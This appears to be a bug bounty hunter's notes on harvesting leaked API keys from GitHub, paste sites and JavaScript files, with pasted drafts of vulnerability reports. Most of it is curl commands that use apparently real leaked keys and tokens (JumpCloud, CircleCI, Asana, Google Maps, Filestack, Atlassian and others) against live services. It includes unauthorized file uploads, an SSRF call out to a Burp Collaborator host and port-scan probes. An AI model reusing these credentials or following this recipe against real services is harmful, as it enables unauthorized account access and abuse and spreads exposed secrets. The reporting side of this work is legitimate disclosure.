Github Recon : Keys token , access key etc
What you can do with keys ?
1. Read API Docs
2. Look for key exchnage codes : curl , python , bash
IMP: curl
3. API docs : keywords (Secret_auth_token)
4. Exchange keys
IMP
1. Secret key - access key = no exploit
2. If no API docs = no exploit,no bug
3. Key should have some priv = info dis , action : delete , revoke, upload etc
https://github.com/streaak/keyhacks
8819ada3791d0ee0e1d71587ff321253a5401a3a
1. curl -X GET \
https://console.jumpcloud.com/api/organizations/ \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'
2. curl -X GET https://console.jumpcloud.com/api/applications \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'
3. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a"
"https://console.jumpcloud.com/api/systems"
4. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a"
"https://console.jumpcloud.com/api/systemusers"
5. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a"
"https://console.jumpcloud.com/api/applications"
site:pastebin.com | site:paste2.org | site:pastehtml.com | site:slexy.org |
site:snipplr.com | site:snipt.net | site:textsnip.com | site:bitpaste.app |
site:justpaste.it | site:heypasteit.com | site:hastebin.com | site:dpaste.org |
site:dpaste.com | site:codepad.org | site:jsitor.com | site:codepen.io |
site:jsfiddle.net | site:dotnetfiddle.net | site:phpfiddle.org |
site:ide.geeksforgeeks.org | site:repl.it | site:ideone.com | site:paste.debian.net
| site:paste.org | site:paste.org.ru | site:codebeautify.org | site:codeshare.io |
site:trello.com "circletoken"
25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af
curl https://circleci.com/api/v1.1/me?circle-
token=25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af
curl --request GET \
--url https://circleci.com/api/v2/me \
--header 'authorization: 25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af'
Steps:
1. Github, Source code , JS files etc
2. Any token,api
3. Look for API docs
4. Look for curl request
5. exchnage keys
6. exploit done
https://app.swaggerhub.com/apis-docs/Vivek-Raj/zomato-api/1.0.0#/Restaurant
%20Reviews/get_reviews
Zomato : 399720f6f904f106e162cd2bd0011a6f
Process
1. Github : "jumpcloud.com" api key
2. Got api key
3. Look for API Docs : jumpcloud api docs curl
4. Look for : curl request
5. Exchange / replace the key in command
6. CMD/ Ubuntu :
Exploit done
Exploits
Third Party : Zomato : Google Map API : Wordpress
Company Service : Uber : API
Detection : Key name , Service name
BASE URL : curl -H "Authorization: 0/ca581dda1b807b654e09b05bd8a8c70"
https://app.asana.com/api/1.0/users/me
Weglot.initialize({
api_key: 'wg_3fa15532f2f69c44a683790307a57b3c7'
});
curl -X POST \
'https://api.weglot.com/translate?api_key=wg_3fa15532f2f69c44a683790307a57b3c7' \
-H 'Content-Type: application/json' \
-d '{
"l_from":"en",
"l_to":"fr",
"request_url":"https://www.re-cap.com/",
"words":[
{"w":"This is a blue car", "t": 1},
{"w":"This is a black car", "t": 1}
]
}'
https://app.asana.com/api/1.0/users/me -H "Authorization: Bearer
0/ca581dda1b807b654e09b05bd8a8c70"
curl https://app.asana.com/api/1.0/users/me \
-H "Authorization: Bearer 0/ca581dda1b807b654e09b05bd8a8c70"
"filepicker_conversion_url":"https://
process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"
curl -X POST \
-d
url="https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_dem
onstration_1.png/420px-PNG_transparency_demonstration_1.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
curl -X POST --data-binary @test.txt --header "Content-Type:plain/text"
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
google query:
grailed.com api docs curl
paytm api docs curl
sement api docs curl
paypal api docs curl
curl --request GET \
--url https://apidojo-hm-hennes-mauritz-v1.p.rapidapi.com/regions/list \
--header 'X-RapidAPI-Host: apidojo-hm-hennes-mauritz-v1.p.rapidapi.com' \
--header 'X-RapidAPI-Key: 7e06e2fe93msh93a651f74b7e29fp17c6e7jsna95be08dc858'
token : E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7
curl -v -X GET https://api-m.sandbox.paypal.com/v1/invoicing/invoices?
page=3&page_size=4&total_count_required=true \
-H "Content-Type: application/json" \
-H "Authorization:
E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7"
curl -u KEY:SECRET 'https://amplitude.com/api/2/events/segmentation?e=\
{"event_type":"_active"\}start=20170301&end=20170321'
curl --header "X-Zomato-API-Key:7749b19667964b87a3efc739e254ada2"
"https://api.zomato.com/v1/search.json?city_id=1"
curl -X GET --header "Accept: application/json" --header "user-key:"
"https://developers.zomato.com/api/v2.1/restaurant?res_id=ccd"
curl -X GET --header "Accept: application/json" --header "user-key:
6aebfe02b9c7820ae965ccf5769fea39"
"https://developers.zomato.com/api/v2.1/restaurant?res_id=1"
1. Look for key name or service name
2. Look for target api docs curl
3. Look for curl command and exchange keys
4. Gather data or exploit
curl -X POST \
-d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
API key exploit led to Blind SSRF, EXIF issue , Third party image upload
Hi team,
Aditya here , Found information disclosure bug . PLease look into it
Description: Disclosed API key to list user information
Developers are increasingly relying on cloud-based tools to automate building
code and deployment of services, which is leading to far more instances of
accidental public exposure of sensitive data.
There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.
Consider Your Data Compromised When You ro any Push a Commit
When it comes to accidental exposure of API keys and other sensitive data on
GitHub, GitHub states very clearly on the advanced Git help page that “once you
have pushed a commit to GitHub, you should consider any data it contains to be
compromised. If you committed a password, change it! If you committed a key,
generate a new one.” GitHub provides detailed instructions on how to purge a file
from a GitHub repository’s history
Key Found URL:
https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5
981/.env
Exploit:
curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"
"https://console.jumpcloud.com/api/systems"
curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"
"https://console.jumpcloud.com/api/systems"
curl -L -X POST 'https://amplitude.com/api/2/lookup_table/:name' \
-u API_KEY:SECRET_KEY \
-F 'file=@"/path/to/file.csv"' \
399720f6f904f106e162cd2bd0011a6f
curl --location --request GET
'https://developers.zomato.com/api/v2.1/categories' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'
curl --location --request GET 'https://developers.zomato.com/api/v2.1/cities?
q=pune&lat=-77596659.4184915&lon=-77596659.4184915&city_ids=*&count=56625527' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'
curl --location --request GET 'https://developers.zomato.com/api/v2.1/cuisines?
lat=-77596659.4184915&lon=-77596659.4184915&city_id=*' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'
1. "zomato.com" api key
2. zomato api docs curl
3. curl
4. exchange keys
Steps:
1. Search API DOCS : grailed api docs curl , filepicker api docs curl
Exploit
Upload any image
Exif Metadata not stripping
curl -X GET "https://www.filestackapi.com/api/file/vVHvaeQTTNKeJybLFdQN/metadata"
https://cdn.fs.grailed.com/vVHvaeQTTNKeJybLFdQN
curl -X POST \
-d url="https://w0xbntim85vtgvu72su9hdji49azyo.burpcollaborator.net/aditya.png"
\
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
filepicker_conversion_url":"https://process.fs.grailed.com","filepicker_key":"AJdAg
nqCST4iPtnUxiGtTz"
site:documenter.getpostman.com inurl:"walmart"
curl --location --request GET 'https://developers.zomato.com/api/v2.1/categories'
--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'
curl --location --request GET 'https://developers.zomato.com/api/v2.1/restaurant?
res_id=56625527' \
--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'
Hello Team,
I aditya shende found critical vulnerability , I hope you remember me ;).
Title: API config endpoint disclosed sensitive key which leads to unauthorised file
upload in grailed domain.
Description:
APIs tend to expose endpoints that handle object identifiers, creating a wide
attack surface Level Access Control issue. Object-level authorization checks should
be considered in every function that accesses a data source using an input from the
user.” - OWASP*
Since APIs enable access to objects, if authorization is broken there is a wide
attack area. Thus, authorization to API-accessible objects must be secured.
Solution: Use an API gateway and implement object-level authorization checks.
Require access tokens to permit access, and only allow access to those with the
proper authorization credentials.
Steps.
1. Visit grailed.com/api/config
2. Search for : "key" and "url" keyword (remove quotes)
Info found:
filepicker_key":"AJdAgnqCST4iPtnUxiGtTz
https://process.fs.grailed.com
Exploit:
curl -X POST \
-d url="https://www.3cx.com/wp-content/uploads/2020/08/3-signs-been-hacked.jpg"
\
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
In this I fetched file from another website to upload
Using this any attacker or bad person can upload a file into your website which may
lead to impersionating profile or reputation issue.
There are multiple attacks we can perform using keys but I chose file upload and
this bug is really CRITICAL so patch it ASAP
POC attached ;
================
Hello team,
Aditya here , I found keys in one of your domain which is vulnerable.
Description: An attacker can exploit the exposure of your API key by making
requests to the Google Maps API that appear to be coming from your app. A group of
malicious users could spam the API to use up your app's "courtesy" bandwidth, or to
run up your bandwidth bill if you have billing enabled for the Google Maps API. If
you (or Google) are keeping a close eye on your bandwidth usage, you could
partially defend against such an attack by revoking and replacing the maps API key
when your app's (apparent) usage of the maps API spikes.
Exploits:
API key is vulnerable for Place Details API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/details/json?
place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key=
AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Nearby Search-Places API! Here is the PoC link which
can be used directly via browser:
https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-
33.8670522,151.1957362&radius=100&types=food&name=harbour&key=AIzaSyAcK69n1PuaZfk7M
FnUiUjiwbIllj6V6JQ
API key is vulnerable for Text Search-Places API! Here is the PoC link which can
be used directly via browser:
https://maps.googleapis.com/maps/api/place/textsearch/json?
query=restaurants+in+Sydney&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Places Photo API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/photo?
maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrky
se7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWg
TK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key=AIzaS
yAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Directions API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/directions/json?
origin=Disneyland&destination=Universal+Studios+Hollywood4&key=AIzaSyAcK69n1PuaZfk7
MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Geocode API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/geocode/json?
latlng=40,30&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Distance Matrix API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/distancematrix/json?
units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-
73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-
73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-
73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-
73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-
73.6334271%7C40.598566%2C-73.7527626&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Find Place From Text API! Here is the PoC link which
can be used directly via browser:
https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of
%20Contemporary%20Art
%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,openin
g_hours,geometry&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Autocomplete API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=
%28cities%29&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Elevation API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-
104.9847034&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
Impact
costing companies extra money and in some cases DOS.
Identifies cost: $5 per 1000 request
POC:
========================================
Hi team,
Aditya here , Found information disclosure bug . PLease look into it
Description: Disclosed API key to list user information
Developers are increasingly relying on cloud-based tools to automate building
code and deployment of services, which is leading to far more instances of
accidental public exposure of sensitive data.
There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.
Consider Your Data Compromised When You ro any Push a Commit
When it comes to accidental exposure of API keys and other sensitive data on
GitHub, GitHub states very clearly on the advanced Git help page that “once you
have pushed a commit to GitHub, you should consider any data it contains to be
compromised. If you committed a password, change it! If you committed a key,
generate a new one.” GitHub provides detailed instructions on how to purge a file
from a GitHub repository’s history
Key Found URL:
https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5
981/.env
Exploit:
curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"
"https://console.jumpcloud.com/api/systems"
POC:
===============================================
Hello team ,
Aditya here found security issue where I got some endpoints and I got api key in
response while exploiting
URL: https://public-api.sandbox.bunq.com/v1/sandbox-user
Exploit :
curl https://public-api.sandbox.bunq.com/v1/sandbox-user -X POST --header
"Content-Type: application/json" --header "Cache-Control: none" --header "User-
Agent: curl-request" --header "X-Bunq-Client-Request-Id: $(date)randomId" --header
"X-Bunq-Language: nl_NL" --header "X-Bunq-Region: nl_NL" --header "X-Bunq-
Geolocation: 0 0 0 0 000"
Response: {"Response":[{"ApiKey":
{"api_key":"sandbox_3ddd71f6415f3cb9f6d8fb30e3ad14fc6f0706aeaa7409f1e1e99474"}}]}
1. API Docs
2. Curl request
3. Exchnage URLS and keys
4. CMD or ubuntu = exploit
IMP
1. Check for API endpoint priv
2. Think out of the box
cat sub.txt | waybackurls | grep .js
Summary: Atlassian token disclosure and crafting nested queries with internal port
scan as SSRF may leads to application level DOS
Steps to reproduce:
1. Use this in cmd: curl -v https://onduo.com --user
admin@onduo.atlassian.net:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
2. I got this token from burpsuite spidering of onduo.atlassian.net
3. Now run this curl -v https://onduo.com:22 --user
admin@onduo.atlassian.net:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
We can see the time delay on port change 80,8080 giving instant response but 22
port giving late reponse
Browser/OS: NA/ Firefox
Attack scenario:
A successful SSRF attack can often result in unauthorized actions or access to data
within the organization, either in the vulnerable application itself or on other
back-end systems that the application can communicate with. In some situations, the
SSRF vulnerability might allow an attacker to perform arbitrary command execution.
An SSRF exploit that causes connections to external third-party systems might
result in malicious onward attacks that appear to originate from the organization
hosting the vulnerable application, leading to potential legal liabilities and
reputational damage.
When we check command on 80,8080 port it gives speedy response but on port 22 it
gives late response . It means 22 closed. If hacker perform this attack like port
scan then this may leads to DOS
POC: https://drive.google.com/file/d/1jXxCH80e9EwGjHWMGC716iB1Z6l4_xsw/view?
usp=sharing
Hello team,
As I mentioned in 2nd step that I got token while crawling whole web app or else
simple method is that we can check source code on following endpoint--
https://onduollc.atlassian.net/projects
Steps to reproduce issue:
1. Check source code of https://onduollc.atlassian.net/projects
2. Search for "atlassian-token"
3. Atlassian token can be used for crafting nested queries but I escalated this to
SSRF port scan
4. Syntax for crafting next queries : curl -v https://mainhost.com --user
anyuser@target.atlassian.net:atlassian_token_here_lout
Exploit command:
1. On port 80
curl -v https://onduo.com:80 --user admin@onduollc.atlassian.net:2f62f85b-0b5e-
4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It crafted queries and gives us valid response , We can say instant response
image.png
2. On port 22
curl -v https://onduo.com:22 --user admin@onduollc.atlassian.net:2f62f85b-0b5e-
4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me response after 1 min 45 seconds :" failed to connect on port 22"
image.png
3. On port 443
curl -v https://onduo.com:443 --user admin@onduollc.atlassian.net:2f62f85b-0b5e-
4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me response which was instant with crafted queries
PORT443.gif
An interesting part is when I change the host on port which we check
Command is curl -v https://enroll.onduo.com:443 --user
admin@onduollc.atlassian.net:2f62f85b-0b5e-4ea0-baf8-
a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
it gave me following information :
__FIREBASE_API_KEY__ = 'AIzaSyCq7ZPizDqVfo0D8y8fTfHIDqJ5Qq7FvFc';
__FIREBASE_PROJECT_ID__ = 'diabetes-management'; __FIREBASE_AUTH_DOMAIN__ =
'diabetes-management.firebaseapp.com'; __FIREBASE_DATABASE_URL__ =
'https:\/\/diabetes-management.firebaseio.com'; __FIREBASE_STORAGE_BUCKET__ =
'diabetes-management.appspot.com'; __FIREBASE_MESSAGING_SENDER_ID__ =
'719737211384'
Also I tried same command with port 3306 it takes a long time
Impact: The first part is , It gives instant response on open port and when I try
with closed port like 3306,22 it takes long to craft queries
So If hacker try same attacks on closed ports so the command will force a server to
craft queries because of a closed port it's not going to craft it . Performing same
attack on closed ports to craft queries will make server engage and this may leads
to DOS attack.
Changing host enroll.onduo.com with port 443 to perform SSRF was giving sensitive
information about firebase stuff
If you've any queries feel free to ask
TASK:
grailed.com | key | exploit